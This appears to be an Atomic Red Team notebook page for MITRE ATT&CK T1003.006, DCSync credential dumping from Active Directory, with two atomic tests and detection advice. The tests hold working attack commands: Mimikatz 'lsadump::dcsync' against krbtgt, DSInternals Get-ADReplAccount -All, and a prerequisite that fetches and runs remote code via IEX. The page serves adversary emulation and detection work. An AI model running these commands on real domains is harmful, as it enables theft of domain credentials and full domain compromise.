# T1003.006 - OS Credential Dumping: DCSync
Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.

Members of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data(Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003)(Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098).(Citation: InsiderThreat ChangeNTLM July 2017)

DCSync functionality has been included in the "lsadump" module in [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.(Citation: Microsoft NRPC Dec 2017)

## Atomic Tests

### Atomic Test #1 - DCSync (Active Directory)
Active Directory attack allowing retrieval of account information without accessing memory or retrieving the NTDS database.
Works against a remote Windows Domain Controller using the replication protocol.
Privileges required: domain admin or domain controller account (by default), or any other account with required rights.
[Reference](https://adsecurity.org/?p=1729)

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})

##### Check Prereq Commands:
```powershell
$mimikatz_path = cmd /c echo %tmp%\mimikatz\x64\mimikatz.exe
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) 
$releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases"
$zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") }
$mimikatz_exe = cmd /c echo %tmp%\mimikatz\x64\mimikatz.exe
$basePath = Split-Path $mimikatz_exe | Split-Path
Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath

```

In [ ]:
Invoke-AtomicTest T1003.006 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
%tmp%\mimikatz\x64\mimikatz.exe "lsadump::dcsync /domain:%userdnsdomain% /user:krbtgt@%userdnsdomain%" "exit"
```

In [ ]:
Invoke-AtomicTest T1003.006 -TestNumbers 1

### Atomic Test #2 - Run DSInternals Get-ADReplAccount
The following Atomic will run Get-ADReplAccount from DSInternals.
Upon successful execution, domain and credentials will appear in stdout. 
[Reference](https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/) CrowdStrike StellerParticle.
https://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: DSInternals must be installed

##### Check Prereq Commands:
```powershell
$RequiredModule = Get-Module -Name DSInternals -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['DSInternals']) {exit 1} else {exit 0}

```
##### Get Prereq Commands:
```powershell
Install-Module -Name DSInternals -Scope CurrentUser -Force

```

In [ ]:
Invoke-AtomicTest T1003.006 -TestNumbers 2 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Get-ADReplAccount -All -Server $ENV:logonserver.TrimStart("\")
```

In [ ]:
Invoke-AtomicTest T1003.006 -TestNumbers 2

## Detection
Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)

Note: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)